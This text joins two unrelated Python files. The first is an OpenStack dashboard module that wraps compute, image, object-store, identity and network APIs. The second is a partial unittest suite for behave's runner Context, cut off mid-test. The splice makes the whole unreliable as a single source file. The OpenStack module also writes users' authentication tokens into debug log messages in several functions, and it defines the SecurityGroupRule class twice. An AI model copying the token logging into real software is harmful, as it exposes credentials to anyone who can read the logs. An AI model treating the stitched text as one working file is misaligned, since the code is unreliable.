# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Methods and interface objects used to interact with external apis.
API method calls return objects that are in many cases objects with
attributes that are direct maps to the data returned from the API http call.
Unfortunately, these objects are also often constructed dynamically, making
it difficult to know what data is available from the API object. Because of
this, all API calls should wrap their returned object in one defined here,
using only explicitly defined atributes and/or methods.
In other words, django_openstack developers not working on django_openstack.api
shouldn't need to understand the finer details of APIs for Nova/Glance/Swift et
al.
"""
import httplib
import json
import logging
import urlparse
from django.conf import settings
from django.contrib import messages
import cloudfiles
import openstack.compute
import openstackx.admin
import openstackx.api.exceptions as api_exceptions
import openstackx.extras
import openstackx.auth
from glance import client as glance_client
from glance.common import exception as glance_exceptions
from novaclient import client as base_nova_client
from novaclient.v1_1 import client as nova_client
from quantum import client as quantum_client
LOG = logging.getLogger('django_openstack.api')
class APIResourceWrapper(object):
""" Simple wrapper for api objects
Define _attrs on the child class and pass in the
api object as the only argument to the constructor
"""
_attrs = []
def __init__(self, apiresource):
self._apiresource = apiresource
def __getattr__(self, attr):
if attr in self._attrs:
# __getattr__ won't find properties
return self._apiresource.__getattribute__(attr)
else:
LOG.debug('Attempted to access unknown attribute "%s" on'
' APIResource object of type "%s" wrapping resource of'
' type "%s"' % (attr, self.__class__,
self._apiresource.__class__))
raise AttributeError(attr)
class APIDictWrapper(object):
""" Simple wrapper for api dictionaries
Some api calls return dictionaries. This class provides identical
behavior as APIResourceWrapper, except that it will also behave as a
dictionary, in addition to attribute accesses.
Attribute access is the preferred method of access, to be
consistent with api resource objects from openstackx
"""
def __init__(self, apidict):
self._apidict = apidict
def __getattr__(self, attr):
if attr in self._attrs:
try:
return self._apidict[attr]
except KeyError, e:
raise AttributeError(e)
else:
LOG.debug('Attempted to access unknown item "%s" on'
'APIResource object of type "%s"'
% (attr, self.__class__))
raise AttributeError(attr)
def __getitem__(self, item):
try:
return self.__getattr__(item)
except AttributeError, e:
# caller is expecting a KeyError
raise KeyError(e)
def get(self, item, default=None):
try:
return self.__getattr__(item)
except AttributeError:
return default
class Container(APIResourceWrapper):
"""Simple wrapper around cloudfiles.container.Container"""
_attrs = ['name']
class Console(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.consoles.Console"""
_attrs = ['id', 'output', 'type']
class Flavor(APIResourceWrapper):
"""Simple wrapper around openstackx.admin.flavors.Flavor"""
_attrs = ['disk', 'id', 'links', 'name', 'ram', 'vcpus']
class FloatingIp(APIResourceWrapper):
"""Simple wrapper for floating ips"""
_attrs = ['ip', 'fixed_ip', 'instance_id', 'id']
class Image(APIDictWrapper):
"""Simple wrapper around glance image dictionary"""
_attrs = ['checksum', 'container_format', 'created_at', 'deleted',
'deleted_at', 'disk_format', 'id', 'is_public', 'location',
'name', 'properties', 'size', 'status', 'updated_at', 'owner']
def __getattr__(self, attrname):
if attrname == "properties":
return ImageProperties(super(Image, self).__getattr__(attrname))
else:
return super(Image, self).__getattr__(attrname)
class ImageProperties(APIDictWrapper):
"""Simple wrapper around glance image properties dictionary"""
_attrs = ['architecture', 'image_location', 'image_state', 'kernel_id',
'project_id', 'ramdisk_id']
class KeyPair(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.keypairs.Keypair"""
_attrs = ['fingerprint', 'name', 'private_key']
class Server(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.server.Server
Preserves the request info so image name can later be retrieved
"""
_attrs = ['addresses', 'attrs', 'hostId', 'id', 'image', 'links',
'metadata', 'name', 'private_ip', 'public_ip', 'status', 'uuid',
'image_name', 'VirtualInterfaces']
def __init__(self, apiresource, request):
super(Server, self).__init__(apiresource)
self.request = request
def __getattr__(self, attr):
if attr == "attrs":
return ServerAttributes(super(Server, self).__getattr__(attr))
else:
return super(Server, self).__getattr__(attr)
@property
def image_name(self):
try:
image = image_get(self.request, self.image['id'])
return image.name
except glance_exceptions.NotFound:
return "(not found)"
def reboot(self, hardness=openstack.compute.servers.REBOOT_HARD):
compute_api(self.request).servers.reboot(self.id, hardness)
class ServerAttributes(APIDictWrapper):
"""Simple wrapper around openstackx.extras.server.Server attributes
Preserves the request info so image name can later be retrieved
"""
_attrs = ['description', 'disk_gb', 'host', 'image_ref', 'kernel_id',
'key_name', 'launched_at', 'mac_address', 'memory_mb', 'name',
'os_type', 'tenant_id', 'ramdisk_id', 'scheduled_at',
'terminated_at', 'user_data', 'user_id', 'vcpus', 'hostname',
'security_groups']
class Services(APIResourceWrapper):
_attrs = ['disabled', 'host', 'id', 'last_update', 'stats', 'type', 'up',
'zone']
class SwiftObject(APIResourceWrapper):
_attrs = ['name']
class Tenant(APIResourceWrapper):
"""Simple wrapper around openstackx.auth.tokens.Tenant"""
_attrs = ['id', 'description', 'enabled', 'name']
class Token(object):
def __init__(self, id=None, serviceCatalog=None, tenant_id=None, user=None):
self.id = id
self.serviceCatalog = serviceCatalog or {}
self.tenant_id = tenant_id
self.user = user or {}
class Usage(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.usage.Usage"""
_attrs = ['begin', 'instances', 'stop', 'tenant_id',
'total_active_disk_size', 'total_active_instances',
'total_active_ram_size', 'total_active_vcpus', 'total_cpu_usage',
'total_disk_usage', 'total_hours', 'total_ram_usage']
class User(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.users.User"""
_attrs = ['email', 'enabled', 'id', 'tenantId', 'name']
class Role(APIResourceWrapper):
"""Wrapper around user role"""
_attrs = ['id', 'name', 'description', 'service_id']
class SecurityGroup(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.security_groups.SecurityGroup"""
_attrs = ['id', 'name', 'description', 'tenant_id', 'rules']
class SecurityGroupRule(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.security_groups.SecurityGroupRule"""
_attrs = ['id', 'parent_group_id', 'group_id', 'ip_protocol',
'from_port', 'to_port', 'groups', 'ip_ranges']
class SecurityGroupRule(APIResourceWrapper):
"""Simple wrapper around openstackx.extras.users.User"""
_attrs = ['id', 'name', 'description', 'tenant_id', 'security_group_rules']
class SwiftAuthentication(object):
"""Auth container to pass CloudFiles storage URL and token from
session.
"""
def __init__(self, storage_url, auth_token):
self.storage_url = storage_url
self.auth_token = auth_token
def authenticate(self):
return (self.storage_url, '', self.auth_token)
class ServiceCatalogException(api_exceptions.ApiException):
def __init__(self, service_name):
message = 'Invalid service catalog service: %s' % service_name
super(ServiceCatalogException, self).__init__(404, message)
class VirtualInterface(APIResourceWrapper):
_attrs = ['id', 'mac_address']
def get_service_from_catalog(catalog, service_type):
for service in catalog:
if service['type'] == service_type:
return service
return None
def url_for(request, service_type, admin=False):
catalog = request.user.service_catalog
service = get_service_from_catalog(catalog, service_type)
if service:
try:
if admin:
return service['endpoints'][0]['adminURL']
else:
return service['endpoints'][0]['internalURL']
except (IndexError, KeyError):
raise ServiceCatalogException(service_type)
else:
raise ServiceCatalogException(service_type)
def check_openstackx(f):
"""Decorator that adds extra info to api exceptions
The dashboard currently depends on openstackx extensions being present
in nova. Error messages depending for views depending on these
extensions do not lead to the conclusion that nova is missing
extensions.
This decorator should be dropped and removed after keystone and
dashboard more gracefully handle extensions and openstackx extensions
aren't required by the dashboard in nova.
"""
def inner(*args, **kwargs):
try:
return f(*args, **kwargs)
except api_exceptions.NotFound, e:
e.message = e.details or ''
e.message += ' This error may be caused by a misconfigured' \
' nova url in keystone\'s service catalog, or ' \
' by missing openstackx extensions in nova. ' \
' See the dashboard README.'
raise
return inner
def compute_api(request):
compute = openstack.compute.Compute(
auth_token=request.user.token,
management_url=url_for(request, 'compute'))
# this below hack is necessary to make the jacobian compute client work
# TODO(mgius): It looks like this is unused now?
compute.client.auth_token = request.user.token
compute.client.management_url = url_for(request, 'compute')
LOG.debug('compute_api connection created using token "%s"'
' and url "%s"' %
(request.user.token, url_for(request, 'compute')))
return compute
def account_api(request):
LOG.debug('account_api connection created using token "%s"'
' and url "%s"' %
(request.user.token,
url_for(request, 'identity', True)))
return openstackx.extras.Account(
auth_token=request.user.token,
management_url=url_for(request, 'identity', True))
def glance_api(request):
o = urlparse.urlparse(url_for(request, 'image'))
LOG.debug('glance_api connection created for host "%s:%d"' %
(o.hostname, o.port))
return glance_client.Client(o.hostname, o.port, auth_tok=request.user.token)
def admin_api(request):
LOG.debug('admin_api connection created using token "%s"'
' and url "%s"' %
(request.user.token, url_for(request, 'compute', True)))
return openstackx.admin.Admin(auth_token=request.user.token,
management_url=url_for(request, 'compute', True))
def extras_api(request):
LOG.debug('extras_api connection created using token "%s"'
' and url "%s"' %
(request.user.token, url_for(request, 'compute')))
return openstackx.extras.Extras(auth_token=request.user.token,
management_url=url_for(request, 'compute'))
def _get_base_client_from_token(tenant_id, token):
'''
Helper function to create an instance of novaclient.client.HTTPClient from
a token and tenant id rather than a username/password.
The returned client can be passed to novaclient.keystone.client.Client
without requiring a second authentication call.
NOTE(gabriel): This ought to live upstream in novaclient, but isn't
currently supported by the HTTPClient.authenticate() method (which only
works with a username and password).
'''
c = base_nova_client.HTTPClient(None, None, tenant_id,
settings.OPENSTACK_KEYSTONE_URL)
body = {"auth": {"tenantId": tenant_id, "token": {"id": token}}}
token_url = urlparse.urljoin(c.auth_url, "tokens")
resp, body = c.request(token_url, "POST", body=body)
c._extract_service_catalog(c.auth_url, resp, body)
return c
def novaclient(request):
LOG.debug('novaclient connection created using token "%s"'
' and url "%s"' % (request.user.token, url_for(request, 'compute')))
c = nova_client.Client(username=request.user.username,
api_key=request.user.token,
project_id=request.user.tenant_id,
auth_url=url_for(request, 'compute'))
c.client.auth_token = request.user.token
c.client.management_url=url_for(request, 'compute')
return c
def auth_api():
LOG.debug('auth_api connection created using url "%s"' %
settings.OPENSTACK_KEYSTONE_URL)
return openstackx.auth.Auth(
management_url=settings.OPENSTACK_KEYSTONE_URL)
def swift_api(request):
LOG.debug('object store connection created using token "%s"'
' and url "%s"' %
(request.session['token'], url_for(request, 'object-store')))
auth = SwiftAuthentication(url_for(request, 'object-store'),
request.session['token'])
return cloudfiles.get_connection(auth=auth)
def quantum_api(request):
tenant = None
if hasattr(request, 'user'):
tenant = request.user.tenant_id
else:
tenant = settings.QUANTUM_TENANT
return quantum_client.Client(settings.QUANTUM_URL, settings.QUANTUM_PORT,
False, tenant, 'json')
def console_create(request, instance_id, kind='text'):
return Console(extras_api(request).consoles.create(instance_id, kind))
def flavor_create(request, name, memory, vcpu, disk, flavor_id):
# TODO -- convert to novaclient when novaclient adds create support
return Flavor(admin_api(request).flavors.create(
name, int(memory), int(vcpu), int(disk), flavor_id))
def flavor_delete(request, flavor_id, purge=False):
# TODO -- convert to novaclient when novaclient adds delete support
admin_api(request).flavors.delete(flavor_id, purge)
def flavor_get(request, flavor_id):
return Flavor(novaclient(request).flavors.get(flavor_id))
def flavor_list(request):
return [Flavor(f) for f in novaclient(request).flavors.list()]
def tenant_floating_ip_list(request):
"""
Fetches a list of all floating ips.
"""
return [FloatingIp(ip) for ip in novaclient(request).floating_ips.list()]
def tenant_floating_ip_get(request, floating_ip_id):
"""
Fetches a floating ip.
"""
return novaclient(request).floating_ips.get(floating_ip_id)
def tenant_floating_ip_allocate(request):
"""
Allocates a floating ip to tenant.
"""
return novaclient(request).floating_ips.create()
def tenant_floating_ip_release(request, floating_ip_id):
"""
Releases floating ip from the pool of a tenant.
"""
return novaclient(request).floating_ips.delete(floating_ip_id)
def image_create(request, image_meta, image_file):
return Image(glance_api(request).add_image(image_meta, image_file))
def image_delete(request, image_id):
return glance_api(request).delete_image(image_id)
def image_get(request, image_id):
return Image(glance_api(request).get_image(image_id)[0])
def image_list_detailed(request):
return [Image(i) for i in glance_api(request).get_images_detailed()]
def snapshot_list_detailed(request):
filters = {}
filters['property-image_type'] = 'snapshot'
filters['is_public'] = 'none'
return [Image(i) for i in glance_api(request)
.get_images_detailed(filters=filters)]
def snapshot_create(request, instance_id, name):
return novaclient(request).servers.create_image(instance_id, name)
def image_update(request, image_id, image_meta=None):
image_meta = image_meta and image_meta or {}
return Image(glance_api(request).update_image(image_id,
image_meta=image_meta))
def keypair_create(request, name):
return KeyPair(novaclient(request).keypairs.create(name))
def keypair_import(request, name, public_key):
return KeyPair(novaclient(request).keypairs.create(name, public_key))
def keypair_delete(request, keypair_id):
novaclient(request).keypairs.delete(keypair_id)
def keypair_list(request):
return [KeyPair(key) for key in novaclient(request).keypairs.list()]
def server_create(request, name, image, flavor,
key_name, user_data, security_groups):
return Server(novaclient(request).servers.create(
name, image, flavor, userdata=user_data,
security_groups=security_groups,
key_name=key_name), request)
def server_delete(request, instance):
compute_api(request).servers.delete(instance)
def server_get(request, instance_id):
return Server(extras_api(request).servers.get(instance_id), request)
@check_openstackx
def server_list(request):
return [Server(s, request) for s in extras_api(request).servers.list()]
@check_openstackx
def admin_server_list(request):
return [Server(s, request) for s in admin_api(request).servers.list()]
def server_reboot(request,
instance_id,
hardness=openstack.compute.servers.REBOOT_HARD):
server = server_get(request, instance_id)
server.reboot(hardness)
def server_update(request, instance_id, name, description):
return extras_api(request).servers.update(instance_id,
name=name,
description=description)
def server_add_floating_ip(request, server, address):
"""
Associates floating IP to server's fixed IP.
"""
server = novaclient(request).servers.get(server)
fip = novaclient(request).floating_ips.get(address)
return novaclient(request).servers.add_floating_ip(server, fip)
def server_remove_floating_ip(request, server, address):
"""
Removes relationship between floating and server's fixed ip.
"""
fip = novaclient(request).floating_ips.get(address)
server = novaclient(request).servers.get(fip.instance_id)
return novaclient(request).servers.remove_floating_ip(server, fip)
def service_get(request, name):
return Services(admin_api(request).services.get(name))
@check_openstackx
def service_list(request):
return [Services(s) for s in admin_api(request).services.list()]
def service_update(request, name, enabled):
return Services(admin_api(request).services.update(name, enabled))
def token_get_tenant(request, tenant_id):
tenants = auth_api().tenants.for_token(request.user.token)
for t in tenants:
if str(t.id) == str(tenant_id):
return Tenant(t)
LOG.warning('Unknown tenant id "%s" requested' % tenant_id)
def token_list_tenants(request, token):
return [Tenant(t) for t in auth_api().tenants.for_token(token)]
def tenant_create(request, tenant_name, description, enabled):
return Tenant(account_api(request).tenants.create(tenant_name,
description,
enabled))
def tenant_get(request, tenant_id):
return Tenant(account_api(request).tenants.get(tenant_id))
@check_openstackx
def tenant_list(request):
return [Tenant(t) for t in account_api(request).tenants.list()]
def tenant_list_for_token(request, token):
# FIXME: use novaclient for this
keystone = openstackx.auth.Auth(
management_url=settings.OPENSTACK_KEYSTONE_URL)
return [Tenant(t) for t in keystone.tenants.for_token(token)]
def users_list_for_token_and_tenant(request, token, tenant):
admin_account = openstackx.extras.Account(
auth_token=token,
management_url=settings.OPENSTACK_KEYSTONE_ADMIN_URL)
return [User(u) for u in admin_account.users.get_for_tenant(tenant)]
def tenant_update(request, tenant_id, tenant_name, description, enabled):
return Tenant(account_api(request).tenants.update(tenant_id,
tenant_name,
description,
enabled))
def token_create(request, tenant, username, password):
'''
Creates a token using the username and password provided. If tenant
is provided it will retrieve a scoped token and the service catalog for
the given tenant. Otherwise it will return an unscoped token and without
a service catalog.
'''
c = base_nova_client.HTTPClient(username, password, tenant,
settings.OPENSTACK_KEYSTONE_URL)
c.version = 'v2.0'
c.authenticate()
access = c.service_catalog.catalog['access']
return Token(id=c.auth_token,
serviceCatalog=access.get('serviceCatalog', None),
user=access['user'],
tenant_id=tenant)
def token_create_scoped(request, tenant, token):
'''
Creates a scoped token using the tenant id and unscoped token; retrieves
the service catalog for the given tenant.
'''
c = _get_base_client_from_token(tenant, token)
access = c.service_catalog.catalog['access']
return Token(id=c.auth_token,
serviceCatalog=access.get('serviceCatalog', None),
user=access['user'],
tenant_id=tenant)
def tenant_quota_get(request, tenant):
return novaclient(request).quotas.get(tenant)
@check_openstackx
def usage_get(request, tenant_id, start, end):
return Usage(extras_api(request).usage.get(tenant_id, start, end))
@check_openstackx
def usage_list(request, start, end):
return [Usage(u) for u in extras_api(request).usage.list(start, end)]
def user_create(request, user_id, email, password, tenant_id, enabled):
return User(account_api(request).users.create(
user_id, email, password, tenant_id, enabled))
def user_delete(request, user_id):
account_api(request).users.delete(user_id)
def user_get(request, user_id):
return User(account_api(request).users.get(user_id))
def security_group_list(request):
return [SecurityGroup(g) for g in novaclient(request).\
security_groups.list()]
def security_group_get(request, security_group_id):
return SecurityGroup(novaclient(request).\
security_groups.get(security_group_id))
def security_group_create(request, name, description):
return SecurityGroup(novaclient(request).\
security_groups.create(name, description))
def security_group_delete(request, security_group_id):
novaclient(request).security_groups.delete(security_group_id)
def security_group_rule_create(request, parent_group_id, ip_protocol=None,
from_port=None, to_port=None, cidr=None,
group_id=None):
return SecurityGroup(novaclient(request).\
security_group_rules.create(parent_group_id,
ip_protocol,
from_port,
to_port,
cidr,
group_id))
def security_group_rule_delete(request, security_group_rule_id):
novaclient(request).security_group_rules.delete(security_group_rule_id)
@check_openstackx
def user_list(request):
return [User(u) for u in account_api(request).users.list()]
def user_update_email(request, user_id, email):
return User(account_api(request).users.update_email(user_id, email))
def user_update_enabled(request, user_id, enabled):
return User(account_api(request).users.update_enabled(user_id, enabled))
def user_update_password(request, user_id, password):
return User(account_api(request).users.update_password(user_id, password))
def user_update_tenant(request, user_id, tenant_id):
return User(account_api(request).users.update_tenant(user_id, tenant_id))
def _get_role(request, name):
roles = account_api(request).roles.list()
for role in roles:
if role.name.lower() == name.lower():
return role
raise Exception('Role does not exist: %s' % name)
def role_add_for_tenant_user(request, tenant_id, user_id, role_name):
role = _get_role(request, role_name)
account_api(request).role_refs.add_for_tenant_user(
tenant_id,
user_id,
role.id)
def role_delete_for_tenant_user(request, tenant_id, user_id, role_name):
role = _get_role(request, role_name)
account_api(request).role_refs.delete_for_tenant_user(
tenant_id,
user_id,
role.id)
def swift_container_exists(request, container_name):
try:
swift_api(request).get_container(container_name)
return True
except cloudfiles.errors.NoSuchContainer:
return False
def swift_object_exists(request, container_name, object_name):
container = swift_api(request).get_container(container_name)
try:
container.get_object(object_name)
return True
except cloudfiles.errors.NoSuchObject:
return False
def swift_get_containers(request):
return [Container(c) for c in swift_api(request).get_all_containers()]
def swift_create_container(request, name):
if swift_container_exists(request, name):
raise Exception('Container with name %s already exists.' % (name))
return Container(swift_api(request).create_container(name))
def swift_delete_container(request, name):
swift_api(request).delete_container(name)
def swift_get_objects(request, container_name, prefix=None):
container = swift_api(request).get_container(container_name)
return [SwiftObject(o) for o in container.get_objects(prefix=prefix)]
def swift_copy_object(request, orig_container_name, orig_object_name,
new_container_name, new_object_name):
container = swift_api(request).get_container(orig_container_name)
if swift_object_exists(request,
new_container_name,
new_object_name) == True:
raise Exception('Object with name %s already exists in container %s'
% (new_object_name, new_container_name))
orig_obj = container.get_object(orig_object_name)
return orig_obj.copy_to(new_container_name, new_object_name)
def swift_upload_object(request, container_name, object_name, object_data):
container = swift_api(request).get_container(container_name)
obj = container.create_object(object_name)
obj.write(object_data)
def swift_delete_object(request, container_name, object_name):
container = swift_api(request).get_container(container_name)
container.delete_object(object_name)
def swift_get_object_data(request, container_name, object_name):
container = swift_api(request).get_container(container_name)
return container.get_object(object_name).stream()
def quantum_list_networks(request):
return quantum_api(request).list_networks()
def quantum_network_details(request, network_id):
return quantum_api(request).show_network_details(network_id)
def quantum_list_ports(request, network_id):
return quantum_api(request).list_ports(network_id)
def quantum_port_details(request, network_id, port_id):
return quantum_api(request).show_port_details(network_id, port_id)
def quantum_create_network(request, data):
return quantum_api(request).create_network(data)
def quantum_delete_network(request, network_id):
return quantum_api(request).delete_network(network_id)
def quantum_update_network(request, network_id, data):
return quantum_api(request).update_network(network_id, data)
def quantum_create_port(request, network_id):
return quantum_api(request).create_port(network_id)
def quantum_delete_port(request, network_id, port_id):
return quantum_api(request).delete_port(network_id, port_id)
def quantum_attach_port(request, network_id, port_id, data):
return quantum_api(request).attach_resource(network_id, port_id, data)
def quantum_detach_port(request, network_id, port_id):
return quantum_api(request).detach_resource(network_id, port_id)
def quantum_set_port_state(request, network_id, port_id, data):
return quantum_api(request).set_port_state(network_id, port_id, data)
def quantum_port_attachment(request, network_id, port_id):
return quantum_api(request).show_port_attachment(network_id, port_id)
def get_vif_ids(request):
vifs = []
attached_vifs = []
# Get a list of all networks
networks_list = quantum_api(request).list_networks()
for network in networks_list['networks']:
ports = quantum_api(request).list_ports(network['id'])
# Get port attachments
for port in ports['ports']:
port_attachment = quantum_api(request).show_port_attachment(
network['id'],
port['id'])
if port_attachment['attachment']:
attached_vifs.append(
port_attachment['attachment']['id'].encode('ascii'))
# Get all instances
instances = server_list(request)
# Get virtual interface ids by instance
for instance in instances:
id = instance.id
instance_vifs = extras_api(request).virtual_interfaces.list(id)
for vif in instance_vifs:
# Check if this VIF is already connected to any port
if str(vif.id) in attached_vifs:
vifs.append({
'id': vif.id,
'instance': instance.id,
'instance_name': instance.name,
'available': False
})
else:
vifs.append({
'id': vif.id,
'instance': instance.id,
'instance_name': instance.name,
'available': True
})
return vifs
class GlobalSummary(object):
node_resources = ['vcpus', 'disk_size', 'ram_size']
unit_mem_size = {'disk_size': ['GiB', 'TiB'], 'ram_size': ['MiB', 'GiB']}
node_resource_info = ['', 'active_', 'avail_']
def __init__(self, request):
self.summary = {}
for rsrc in GlobalSummary.node_resources:
for info in GlobalSummary.node_resource_info:
self.summary['total_' + info + rsrc] = 0
self.request = request
self.service_list = []
self.usage_list = []
def service(self):
try:
self.service_list = service_list(self.request)
except api_exceptions.ApiException, e:
self.service_list = []
LOG.exception('ApiException fetching service list in instance usage')
messages.error(self.request,
'Unable to get service info: %s' % e.message)
return
for service in self.service_list:
if service.type == 'nova-compute':
self.summary['total_vcpus'] += min(service.stats['max_vcpus'],
service.stats.get('vcpus', 0))
self.summary['total_disk_size'] += min(
service.stats['max_gigabytes'],
service.stats.get('local_gb', 0))
self.summary['total_ram_size'] += min(
service.stats['max_ram'],
service.stats['memory_mb']) if 'max_ram' \
in service.stats \
else service.stats.get('memory_mb', 0)
def usage(self, datetime_start, datetime_end):
try:
self.usage_list = usage_list(self.request, datetime_start,
datetime_end)
except api_exceptions.ApiException, e:
self.usage_list = []
LOG.exception('ApiException fetching usage list in instance usage'
' on date range "%s to %s"' % (datetime_start,
datetime_end))
messages.error(self.request,
'Unable to get usage info: %s' % e.message)
return
for usage in self.usage_list:
# FIXME: api needs a simpler dict interface (with iteration)
# - anthony
# NOTE(mgius): Changed this on the api end. Not too much
# neater, but at least its not going into private member
# data of an external class anymore
# usage = usage._info
for k in usage._attrs:
v = usage.__getattr__(k)
if type(v) in [float, int]:
if not k in self.summary:
self.summary[k] = 0
self.summary[k] += v
def human_readable(self, rsrc):
if self.summary['total_' + rsrc] > 1023:
self.summary['unit_' + rsrc] = GlobalSummary.unit_mem_size[rsrc][1]
mult = 1024.0
else:
self.summary['unit_' + rsrc] = GlobalSummary.unit_mem_size[rsrc][0]
mult = 1.0
for kind in GlobalSummary.node_resource_info:
self.summary['total_' + kind + rsrc + '_hr'] = \
self.summary['total_' + kind + rsrc] / mult
def avail(self):
for rsrc in GlobalSummary.node_resources:
self.summary['total_avail_' + rsrc] = \
self.summary['total_' + rsrc] - \
self.summary['total_active_' + rsrc]
| |
# -*- coding: UTF-8 -*-
# pylint: disable=too-many-lines, line-too-long
from __future__ import absolute_import, print_function, with_statement
from collections import defaultdict
from platform import python_implementation
import os.path
import sys
import warnings
import tempfile
import unittest
import six
from six import StringIO
from mock import Mock, patch
from nose.tools import * # pylint: disable=wildcard-import, unused-wildcard-import
from behave.model import Table
from behave.step_registry import StepRegistry
from behave import parser, runner
from behave.configuration import ConfigError
from behave.formatter.base import StreamOpener
# -- CONVENIENCE-ALIAS:
_text = six.text_type
class TestContext(unittest.TestCase):
# pylint: disable=invalid-name, protected-access, no-self-use
def setUp(self):
r = Mock()
self.config = r.config = Mock()
r.config.verbose = False
self.context = runner.Context(r)
def test_user_mode_shall_restore_behave_mode(self):
# -- CASE: No exception is raised.
initial_mode = runner.Context.BEHAVE
eq_(self.context._mode, initial_mode)
with self.context.user_mode():
eq_(self.context._mode, runner.Context.USER)
self.context.thing = "stuff"
eq_(self.context._mode, initial_mode)
def test_user_mode_shall_restore_behave_mode_if_assert_fails(self):
initial_mode = runner.Context.BEHAVE
eq_(self.context._mode, initial_mode)
try:
with self.context.user_mode():
eq_(self.context._mode, runner.Context.USER)
assert False, "XFAIL"
except AssertionError:
eq_(self.context._mode, initial_mode)
def test_user_mode_shall_restore_behave_mode_if_exception_is_raised(self):
initial_mode = runner.Context.BEHAVE
eq_(self.context._mode, initial_mode)
try:
with self.context.user_mode():
eq_(self.context._mode, runner.Context.USER)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
def test_use_with_user_mode__shall_restore_initial_mode(self):
# -- CASE: No exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.BEHAVE
self.context._mode = initial_mode
with self.context.use_with_user_mode():
eq_(self.context._mode, runner.Context.USER)
self.context.thing = "stuff"
eq_(self.context._mode, initial_mode)
def test_use_with_user_mode__shall_restore_initial_mode_with_error(self):
# -- CASE: Exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.BEHAVE
self.context._mode = initial_mode
try:
with self.context.use_with_user_mode():
eq_(self.context._mode, runner.Context.USER)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
def test_use_with_behave_mode__shall_restore_initial_mode(self):
# -- CASE: No exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.USER
self.context._mode = initial_mode
with self.context._use_with_behave_mode():
eq_(self.context._mode, runner.Context.BEHAVE)
self.context.thing = "stuff"
eq_(self.context._mode, initial_mode)
def test_use_with_behave_mode__shall_restore_initial_mode_with_error(self):
# -- CASE: Exception is raised.
# pylint: disable=protected-access
initial_mode = runner.Context.USER
self.context._mode = initial_mode
try:
with self.context._use_with_behave_mode():
eq_(self.context._mode, runner.Context.BEHAVE)
raise RuntimeError("XFAIL")
except RuntimeError:
eq_(self.context._mode, initial_mode)
def test_context_contains(self):
eq_("thing" in self.context, False)
self.context.thing = "stuff"
eq_("thing" in self.context, True)
self.context._push()
eq_("thing" in self.context, True)
def test_attribute_set_at_upper_level_visible_at_lower_level(self):
self.context.thing = "stuff"
self.context._push()
eq_(self.context.thing, "stuff")
def test_attribute_set_at_lower_level_not_visible_at_upper_level(self):
self.context._push()
self.context.thing = "stuff"
self.context._pop()
assert getattr(self.context, "thing", None) is None
def test_attributes_set_at_upper_level_visible_at_lower_level(self):
self.context.thing = "stuff"
self.context._push()
eq_(self.context.thing, "stuff")
self.context.other_thing = "more stuff"
self.context._push()
eq_(self.context.thing, "stuff")
eq_(self.context.other_thing, "more stuff")
self.context.third_thing = "wombats"
self.context._push()
eq_(self.context.thing, "stuff")
eq_(self.context.other_thing, "more stuff")
eq_(self.context.third_thing, "wombats")
def test_attributes_set_at_lower_level_not_visible_at_upper_level(self):
self.context.thing = "stuff"
self.context._push()
self.context.other_thing = "more stuff"
self.context._push()
self.context.third_thing = "wombats"
eq_(self.context.thing, "stuff")
eq_(self.context.other_thing, "more stuff")
eq_(self.context.third_thing, "wombats")
self.context._pop()
eq_(self.context.thing, "stuff")
eq_(self.context.other_thing, "more stuff")
assert getattr(self.context, "third_thing", None) is None, "%s is not None" % self.context.third_thing
self.context._pop()
eq_(self.context.thing, "stuff")
assert getattr(self.context, "other_thing", None) is None, "%s is not None" % self.context.other_thing
assert getattr(self.context, "third_thing", None) is None, "%s is not None" % self.context.third_thing
def test_masking_existing_user_attribute_when_verbose_causes_warning(self):
warns = []
def catch_warning(*args, **kwargs):
warns.append(args[0])
old_showwarning = warnings.showwarning
warnings.showwarning = catch_warning
# pylint: disable=protected-access
self.config.verbose = True
with self.context.use_with_user_mode():
self.context.thing = "stuff"
self.context._push()
self.context.thing = "other stuff"
warnings.showwarning = old_showwarning
print(repr(warns))
assert warns, "warns is empty!"
warning = warns[0]
assert isinstance(warning, runner.ContextMaskWarning), "warning is not a ContextMaskWarning"
info = warning.args[0]
assert info.startswith("user code"), "%r doesn't start with 'user code'" % info
assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
assert "tutorial" in info, '"tutorial" not in %r' % (info, )
def test_masking_existing_user_attribute_when_not_verbose_causes_no_warning(self):
warns = []
def catch_warning(*args, **kwargs):
warns.append(args[0])
old_showwarning = warnings.showwarning
warnings.showwarning = catch_warning
# explicit
# pylint: disable=protected-access
self.config.verbose = False
with self.context.use_with_user_mode():
self.context.thing = "stuff"
self.context._push()
self.context.thing = "other stuff"
warnings.showwarning = old_showwarning
assert not warns
def test_behave_masking_user_attribute_causes_warning(self):
warns = []
def catch_warning(*args, **kwargs):
warns.append(args[0])
old_showwarning = warnings.showwarning
warnings.showwarning = catch_warning
with self.context.use_with_user_mode():
self.context.thing = "stuff"
# pylint: disable=protected-access
self.context._push()
self.context.thing = "other stuff"
warnings.showwarning = old_showwarning
print(repr(warns))
assert warns, "OOPS: warns is empty, but expected non-empty"
warning = warns[0]
assert isinstance(warning, runner.ContextMaskWarning), "warning is not a ContextMaskWarning"
info = warning.args[0]
assert info.startswith("behave runner"), "%r doesn't start with 'behave runner'" % info
assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
filename = __file__.rsplit(".", 1)[0]
if python_implementation() == "Jython":
filename = filename.replace("$py", ".py")
assert filename in info, "%r not in %r" % (filename, info)
def test_setting_root_attribute_that_masks_existing_causes_warning(self):
# pylint: disable=protected-access
warns = []
def catch_warning(*args, **kwargs):
warns.append(args[0])
old_showwarning = warnings.showwarning
warnings.showwarning = catch_warning
with self.context.use_with_user_mode():
self.context._push()
self.context.thing = "teak"
self.context._set_root_attribute("thing", "oak")
warnings.showwarning = old_showwarning
print(repr(warns))
assert warns
warning = warns[0]
